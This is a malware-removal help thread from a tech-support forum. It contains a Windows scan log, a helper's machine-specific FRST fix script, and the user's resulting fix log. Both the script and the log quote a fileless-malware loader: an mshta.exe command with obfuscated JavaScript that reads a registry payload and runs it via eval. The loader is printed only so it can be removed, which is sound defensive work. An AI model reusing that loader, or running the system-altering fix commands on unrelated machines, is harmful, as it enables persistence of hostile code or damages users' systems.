FirewallRules: [UDP Query User{F017EC39-E28A-4239-A5D7-AD7A6E2D67DF}C:\windows\syswow64\dplaysvr.exe] => (Block) C:\windows\syswow64\dplaysvr.exe
FirewallRules: [TCP Query User{12D1A36E-E588-471C-A733-0AAED90E0A96}C:\program files (x86)\anarchy\ageofcastles\age-of-castles.exe] => (Allow) C:\program files (x86)\anarchy\ageofcastles\age-of-castles.exe
FirewallRules: [UDP Query User{29FFD94E-99E7-473A-A2E0-FE6F191742A7}C:\program files (x86)\anarchy\ageofcastles\age-of-castles.exe] => (Allow) C:\program files (x86)\anarchy\ageofcastles\age-of-castles.exe
FirewallRules: [{95C62BB0-D859-4E2A-A64D-8D8BBA8713A8}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPDeviceDetection3.exe
FirewallRules: [{A913A0C9-B9F1-41E5-9390-AEFE15BA282E}] => (Allow) C:\Program Files (x86)\Pogo Games\PogoDGC.exe
FirewallRules: [{4CC961E5-0940-4383-A41A-33B1D705CA94}] => (Allow) C:\Program Files (x86)\Pogo Games\PogoDGC.exe
FirewallRules: [{27C90A35-DF5A-4E93-81EF-A588F39C847B}] => (Allow) C:\Program Files (x86)\Pogo Games\WebUpdater.exe
FirewallRules: [{4F12C549-3FEB-4BEB-84FF-242D4191D08B}] => (Allow) C:\Program Files (x86)\Pogo Games\WebUpdater.exe
FirewallRules: [{DF3D7CBC-116B-41C7-80CF-EDBF386A68ED}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{07751770-2A7C-4575-8FA9-97329195C28E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{807F2D7A-B2ED-429A-AE1E-B61DF684C77C}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{4CD107E7-A2A0-4768-96A3-228E003EE820}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A20F1399-AB43-4ECC-A227-35DC9F054463}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

26-11-2015 04:00:44 Windows Update
26-11-2015 06:06:46 Windows Update
23-01-2016 23:14:41 Windows Update
21-02-2016 09:37:25 Scheduled Checkpoint
28-02-2016 14:02:23 Scheduled Checkpoint
23-03-2016 18:16:58 Scheduled Checkpoint
25-11-2016 17:41:05 Installed HP Support Assistant
25-11-2016 18:46:00 Windows Modules Installer
26-11-2016 04:54:50 Windows Modules Installer
26-11-2016 04:56:47 Windows Modules Installer
26-11-2016 04:59:57 Windows Update

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (11/29/2016 02:43:31 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (11/29/2016 08:45:25 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (11/28/2016 02:02:21 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (11/28/2016 09:10:38 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (11/27/2016 02:43:06 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (11/27/2016 09:23:08 AM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (11/26/2016 09:48:36 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program IEXPLORE.EXE version 11.0.9600.18098 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 1360

Start Time: 01d24857f9a2287a

Termination Time: 1954

Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Report Id:

Error: (11/26/2016 08:36:33 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (11/26/2016 07:13:47 PM) (Source: CVHSVC) (EventID: 100) (User: )
Description: Information only.
(Patch task for {90140011-0066-0409-0000-0000000FF1CE}): DownloadLatest Failed: HTTP status 403: The client does not have sufficient access rights to the requested server object.

Error: (11/26/2016 06:57:23 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine CoCreateInstance. hr = 0x80070565, The maximum number of secrets that may be stored in a single system has been exceeded.
.

System errors:
=============
Error: (11/29/2016 05:48:48 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the Amsp service.

Error: (11/29/2016 03:48:52 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (11/29/2016 02:30:16 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Trend Micro Password Manager Central Control Service service hung on starting.

Error: (11/29/2016 08:32:41 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Trend Micro Password Manager Central Control Service service hung on starting.

Error: (11/29/2016 08:31:20 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Application Virtualization Client service failed to start due to the following error:
The service did not respond to the start or control request in a timely fashion.

Error: (11/29/2016 08:31:20 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Application Virtualization Client service to connect.

Error: (11/28/2016 11:58:22 PM) (Source: bowser) (EventID: 8003) (User: )
Description: The master browser has received a server announcement from the computer ERIC-PC
that believes that it is the master browser for the domain on transport NetBT_Tcpip_{F0E8B706-0741-4AF1-9C36-E152BF2CFE79}.
The master browser is stopping or an election is being forced.

Error: (11/28/2016 10:58:21 PM) (Source: bowser) (EventID: 8003) (User: )
Description: The master browser has received a server announcement from the computer ERIC-PC
that believes that it is the master browser for the domain on transport NetBT_Tcpip_{F0E8B706-0741-4AF1-9C36-E152BF2CFE79}.
The master browser is stopping or an election is being forced.

Error: (11/28/2016 10:56:21 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the Wlansvc service.

Error: (11/28/2016 10:56:21 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the HPWMISVC service.

==================== Memory info ===========================

Processor: AMD Athlon™ II P340 Dual-Core Processor
Percentage of memory in use: 52%
Total physical RAM: 2810.9 MB
Available physical RAM: 1323.04 MB
Total Virtual: 5620.01 MB
Available Virtual: 3070.5 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:281.48 GB) (Free:201.92 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (RECOVERY) (Fixed) (Total:16.31 GB) (Free:2.35 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive f: (HP_TOOLS) (Fixed) (Total:0.1 GB) (Free:0.09 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: 82337274)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=281.5 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=16.3 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=103 MB) - (Type=0C)

==================== End of Addition.txt ============================

#2
zep516

Posted 29 November 2016 - 08:55 PM

Trusted Helper

Malware Removal
8,093 posts

Hi! My name is zep516 and Welcome to Geekstogo!
I'll do the best I can to resolve your computer issue
Please make sure to carefully read any instruction that I give you. If you're not sure, or if something unexpected happens, don't continue Stop and ask! Never be afraid to ask questions!

Unistall these programs

Free Ride Games Player
Internet Explorer Toolbar 4.8 by SweetPacks

Pogo Games

Next

A few items to fix
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
Open notepad (Start =>All Programs => Accessories => Notepad).
Copy/Paste the contents of the code box below into Notepad.

start
CloseProcesses:
CreateRestorePoint:
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Run: [**cahlhsssc<*>] => "C:\Users\Owner\AppData\Local\767c1f6b\2930e3b3.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Policies\Explorer: [NoDesktopCleanupWizard] 1
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Control Panel\Desktop\\SCRNSAVE.EXE ->
SearchScopes: HKLM -> DefaultScope {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {6B8BA6E1-8F10-4950-B910-5A0B3FBECC12} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM -> {A146E056-68CF-4452-8523-A85234CC5BB8} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM -> {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM-x32 -> DefaultScope {EEE6C360-6118-11DC-9C72-001320C79847} URL =
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {6B8BA6E1-8F10-4950-B910-5A0B3FBECC12} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 -> {A146E056-68CF-4452-8523-A85234CC5BB8} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM-x32 -> {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> DefaultScope {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {6B8BA6E1-8F10-4950-B910-5A0B3FBECC12} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {A146E056-68CF-4452-8523-A85234CC5BB8} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {DD66E0F9-891E-4029-BFE7-4D11B4EC6A9F} URL = hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
BHO-x32: Unit -> {2C4BA31C-0C15-11E2-90C7-9BFCBEB168B3} -> C:\Users\Owner\AppData\Local\UnitLayers\temp.dat [2013-04-06] ()
BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
BHO-x32: GamesBar -> {6F282B65-56BF-4BD1-A8B2-A4449A05863D} -> C:\Program Files (x86)\GamesBar\oberontb.dll => No File
Toolbar: HKLM-x32 - GamesBar - {6F282B65-56BF-4BD1-A8B2-A4449A05863D} - C:\Program Files (x86)\GamesBar\oberontb.dll No File
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: www.exent.com/GameTreatWidget -> C:\Program Files (x86)\Free Ride Games\NPGameTreatPlugin.dll [No File]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\firefox.cfg [2013-07-16] <==== ATTENTION
R2 X5XSEx_Pr143; C:\Program Files (x86)\Free Ride Games\X5XSEx_Pr143.Sys [56136 2012-08-02] (Exent Technologies Ltd.)
2016-11-26 22:41 - 2016-11-26 22:41 - 00000000 _____ C:\Windows\SysWOW64\sho214.tmp
2016-11-26 05:44 - 2016-11-26 05:44 - 00000000 _____ C:\Windows\SysWOW64\shoAE78.tmp
Task: {EDE4CF83-5407-4471-B818-DC680F968903} - \TidyNetwork Update -> No File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Temp:426D1496 [75]
AlternateDataStreams: C:\ProgramData\Temp:8A620099 [134]
AlternateDataStreams: C:\ProgramData\Temp:9AB56A06 [172]
AlternateDataStreams: C:\ProgramData\Temp:E73B14E2 [110]
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\30553336.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\31DADE60.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\55732387.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\30553336.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\31DADE60.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\55732387.sys => ""="Driver"
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Classes\e9a49d30: "C:\Windows\system32\mshta.exe" "javascript:bXxl1P="oktC1";aI78=new ActiveXObject("WScript.Shell");luMP2="G";v42nLt=aI78.RegRead("HKCU\\software\\zorrezmj\\oxewpwu");LdTl1eK="v";eval(v42nLt);QT5Gd="gu1ev8s";" <===== ATTENTION
DeleteKey: HKCU\\software\\zorrezmj 
DeleteKey: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Classes\e9a49d30
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset catalog
CMD: ipconfig /flushdns
RemoveProxy:
hosts:
Emptytemp:

Click Format and ensure Wordwrap is unchecked.
Save as Fixlist.txt to your Desktop (Must be in this location)
Run FRST/FRST64 and press the Fix button just once and wait.
If the tool needed a restart please make sure you let the system to restart normally and let the tool completes its run after restart.
The tool will make a log on the Desktop (Fixlog.txt). Please post it to your next reply.

Note: If the tool warns you about the version you're using being an outdated version please download and run the updated version.

#3
dreamtime

Posted 30 November 2016 - 02:27 PM

New Member

Topic Starter
Member
6 posts

Thanks for responding. I couldn't uninstall Internet Explorer Toolbar 4.8 by SweetPacks from Control Panel. It said the uninstall file couldn't be found. Everything else has been done. Here is the log for you.

Fix result of Farbar Recovery Scan Tool (x64) Version: 30-11-2016
Ran by Owner (30-11-2016 15:09:31) Run:1
Running from C:\Users\Owner\Desktop
Loaded Profiles: Owner (Available Profiles: Owner)
Boot Mode: Normal
==============================================

fixlist content:
*****************
start
CloseProcesses:
CreateRestorePoint:
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Run: [**cahlhsssc<*>] => "C:\Users\Owner\AppData\Local\767c1f6b\2930e3b3.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Policies\Explorer: [NoDesktopCleanupWizard] 1
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Control Panel\Desktop\\SCRNSAVE.EXE ->
SearchScopes: HKLM -> DefaultScope {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {6B8BA6E1-8F10-4950-B910-5A0B3FBECC12} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM -> {A146E056-68CF-4452-8523-A85234CC5BB8} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM -> {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM-x32 -> DefaultScope {EEE6C360-6118-11DC-9C72-001320C79847} URL =
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {6B8BA6E1-8F10-4950-B910-5A0B3FBECC12} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 -> {A146E056-68CF-4452-8523-A85234CC5BB8} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM-x32 -> {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> DefaultScope {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {6B8BA6E1-8F10-4950-B910-5A0B3FBECC12} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {A146E056-68CF-4452-8523-A85234CC5BB8} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {DD66E0F9-891E-4029-BFE7-4D11B4EC6A9F} URL = hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
BHO-x32: Unit -> {2C4BA31C-0C15-11E2-90C7-9BFCBEB168B3} -> C:\Users\Owner\AppData\Local\UnitLayers\temp.dat [2013-04-06] ()
BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
BHO-x32: GamesBar -> {6F282B65-56BF-4BD1-A8B2-A4449A05863D} -> C:\Program Files (x86)\GamesBar\oberontb.dll => No File
Toolbar: HKLM-x32 - GamesBar - {6F282B65-56BF-4BD1-A8B2-A4449A05863D} - C:\Program Files (x86)\GamesBar\oberontb.dll No File
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: www.exent.com/GameTreatWidget -> C:\Program Files (x86)\Free Ride Games\NPGameTreatPlugin.dll [No File]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\firefox.cfg [2013-07-16] <==== ATTENTION
R2 X5XSEx_Pr143; C:\Program Files (x86)\Free Ride Games\X5XSEx_Pr143.Sys [56136 2012-08-02] (Exent Technologies Ltd.)
2016-11-26 22:41 - 2016-11-26 22:41 - 00000000 _____ C:\Windows\SysWOW64\sho214.tmp
2016-11-26 05:44 - 2016-11-26 05:44 - 00000000 _____ C:\Windows\SysWOW64\shoAE78.tmp
Task: {EDE4CF83-5407-4471-B818-DC680F968903} - \TidyNetwork Update -> No File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Temp:426D1496 [75]
AlternateDataStreams: C:\ProgramData\Temp:8A620099 [134]
AlternateDataStreams: C:\ProgramData\Temp:9AB56A06 [172]
AlternateDataStreams: C:\ProgramData\Temp:E73B14E2 [110]
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\30553336.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\31DADE60.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\55732387.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\30553336.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\31DADE60.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\55732387.sys => ""="Driver"
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Classes\e9a49d30: "C:\Windows\system32\mshta.exe" "javascript:bXxl1P="oktC1";aI78=new ActiveXObject("WScript.Shell");luMP2="G";v42nLt=aI78.RegRead("HKCU\\software\\zorrezmj\\oxewpwu");LdTl1eK="v";eval(v42nLt);QT5Gd="gu1ev8s";" <===== ATTENTION
DeleteKey: HKCU\\software\\zorrezmj
DeleteKey: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Classes\e9a49d30
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset catalog
CMD: ipconfig /flushdns
RemoveProxy:
hosts:
Emptytemp:
*****************

Processes closed successfully.
Restore point was successfully created.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**cahlhsssc<*> => value not found.
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoDesktopCleanupWizard => value removed successfully
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Control Panel\Desktop\\SCRNSAVE.EXE => value removed successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => key removed successfully
HKCR\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6B8BA6E1-8F10-4950-B910-5A0B3FBECC12}" => key removed successfully
HKCR\CLSID\{6B8BA6E1-8F10-4950-B910-5A0B3FBECC12} => key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{A146E056-68CF-4452-8523-A85234CC5BB8}" => key removed successfully
HKCR\CLSID\{A146E056-68CF-4452-8523-A85234CC5BB8} => key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{F3365E98-A4CC-465D-8C1C-98E63E1F3FFA}" => key removed successfully
HKCR\CLSID\{F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} => key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646}" => key removed successfully
HKCR\CLSID\{FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => key removed successfully
HKCR\Wow6432Node\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{6B8BA6E1-8F10-4950-B910-5A0B3FBECC12}" => key removed successfully
HKCR\Wow6432Node\CLSID\{6B8BA6E1-8F10-4950-B910-5A0B3FBECC12} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{A146E056-68CF-4452-8523-A85234CC5BB8}" => key removed successfully
HKCR\Wow6432Node\CLSID\{A146E056-68CF-4452-8523-A85234CC5BB8} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{F3365E98-A4CC-465D-8C1C-98E63E1F3FFA}" => key removed successfully
HKCR\Wow6432Node\CLSID\{F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646}" => key removed successfully
HKCR\Wow6432Node\CLSID\{FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646} => key not found.
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
"HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6B8BA6E1-8F10-4950-B910-5A0B3FBECC12}" => key removed successfully
HKCR\CLSID\{6B8BA6E1-8F10-4950-B910-5A0B3FBECC12} => key not found.
"HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{A146E056-68CF-4452-8523-A85234CC5BB8}" => key removed successfully
HKCR\CLSID\{A146E056-68CF-4452-8523-A85234CC5BB8} => key not found.
"HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{DD66E0F9-891E-4029-BFE7-4D11B4EC6A9F}" => key removed successfully
HKCR\CLSID\{DD66E0F9-891E-4029-BFE7-4D11B4EC6A9F} => key not found.
"HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646}" => key removed successfully
HKCR\CLSID\{FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{2C4BA31C-0C15-11E2-90C7-9BFCBEB168B3}" => key removed successfully
"HKCR\Wow6432Node\CLSID\{2C4BA31C-0C15-11E2-90C7-9BFCBEB168B3}" => key removed successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5C255C8A-E604-49b4-9D64-90988571CECB}" => key removed successfully
HKCR\Wow6432Node\CLSID\{5C255C8A-E604-49b4-9D64-90988571CECB} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6F282B65-56BF-4BD1-A8B2-A4449A05863D}" => key removed successfully
"HKCR\Wow6432Node\CLSID\{6F282B65-56BF-4BD1-A8B2-A4449A05863D}" => key removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{6F282B65-56BF-4BD1-A8B2-A4449A05863D} => value removed successfully
HKCR\Wow6432Node\CLSID\{6F282B65-56BF-4BD1-A8B2-A4449A05863D} => key not found.
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => key removed successfully
HKLM\Software\Wow6432Node\MozillaPlugins\www.exent.com/GameTreatWidget => key not found.
C:\Program Files (x86)\mozilla firefox\firefox.cfg => moved successfully
X5XSEx_Pr143 => service not found.
C:\Windows\SysWOW64\sho214.tmp => moved successfully
C:\Windows\SysWOW64\shoAE78.tmp => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{EDE4CF83-5407-4471-B818-DC680F968903}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EDE4CF83-5407-4471-B818-DC680F968903}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\TidyNetwork Update" => key removed successfully
